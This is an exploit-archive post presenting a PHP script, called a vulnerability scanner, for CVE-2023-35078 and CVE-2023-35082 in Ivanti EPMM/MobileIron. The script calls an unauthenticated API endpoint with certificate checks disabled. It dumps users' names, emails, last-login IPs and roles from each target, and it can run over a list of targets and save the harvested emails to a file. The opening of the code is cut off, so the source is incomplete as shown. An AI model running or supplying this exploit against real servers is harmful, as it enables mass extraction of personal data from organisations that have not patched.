============================================================================================================================================= | # Title : Ivanti 11.10 MobileIron Vulnerability Scanner | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://help.ivanti.com/iv/help/en_US/RS/vNow/Version-11-10-00-Release-Notes.htm | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/213672/ & CVE-2023-35078, CVE-2023-35082 [+] Summary : This PHP-based scanner detects unauthenticated access vulnerabilities in Ivanti EPMM / MobileIron products. The issue allows attackers to retrieve sensitive user information via exposed API endpoints. [+] PoC : php poc.php -u https://target.com -v -f targets.txt -o result.txt "CVE-2023-35082", "mifs/aad" => "CVE-2023-35078" ]; $timeout = 5; $userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"; function fetchData($baseUrl, $path, $timeout, $userAgent) { $url = rtrim($baseUrl, "/") . "/$path/api/v2/authorized/users?adminDeviceSpaceId=1"; $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_TIMEOUT => $timeout, CURLOPT_HTTPHEADER => [ "User-Agent: $userAgent", "Accept: application/json" ] ]); $response = curl_exec($ch); curl_close($ch); if (!$response) { return null; } $json = json_decode($response, true); return is_array($json) ? $json : null; } function processUrl($baseUrl, $verbose = false, $outputFile = null) { global $vulnerabilities, $timeout, $userAgent; $parsed = parse_url($baseUrl); $scheme = $parsed["scheme"] ?? "http"; $host = $parsed["host"]; $port = $parsed["port"] ?? ($scheme === "https" ? 443 : 80); $foundCVEs = []; $validData = null; $validUrl = null; foreach ($vulnerabilities as $path => $cve) { $tests = ($cve === "CVE-2023-35082") ? [[$port, $scheme], [8080, "http"], [8080, "https"]] : [[$port, $scheme]]; foreach ($tests as [$p, $s]) { $url = "$s://$host:$p"; if ($verbose) { echo "[*] Testing $url/$path\n"; } $data = fetchData($url, $path, $timeout, $userAgent); if ($data) { $foundCVEs[] = $cve; $validData = $data; $validUrl = $url; } } } if ($validData) { processData($validUrl, array_unique($foundCVEs), $validData, $verbose, $outputFile); } } function processData($baseUrl, $cves, $data, $verbose, $outputFile) { echo "[!] $baseUrl MAY BE VULNERABLE TO: " . implode(", ", $cves) . "\n"; $results = $data["results"] ?? $data["result"] ?? []; $emails = []; foreach ($results as $user) { $email = $user["email"] ?? null; if ($email) { $emails[] = $email; if ($verbose) { echo "Name : {$user['displayName']}\n"; echo "Email: $email\n"; echo "IP : {$user['lastLoginIp']}\n"; echo "Roles: " . implode(", ", $user["roles"]) . "\n"; echo str_repeat("-", 40) . "\n"; } } } $emails = array_unique($emails); if ($outputFile) { file_put_contents( $outputFile, "$baseUrl [" . implode(",", $cves) . "] " . implode(",", array_slice($emails, 0, 5)) . PHP_EOL, FILE_APPEND ); } } $options = getopt("u:f:o:v"); if (isset($options["u"])) { processUrl($options["u"], isset($options["v"]), $options["o"] ?? null); } if (isset($options["f"])) { $urls = file($options["f"], FILE_IGNORE_NEW_LINES); foreach ($urls as $url) { processUrl(trim($url), isset($options["v"]), $options["o"] ?? null); } } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================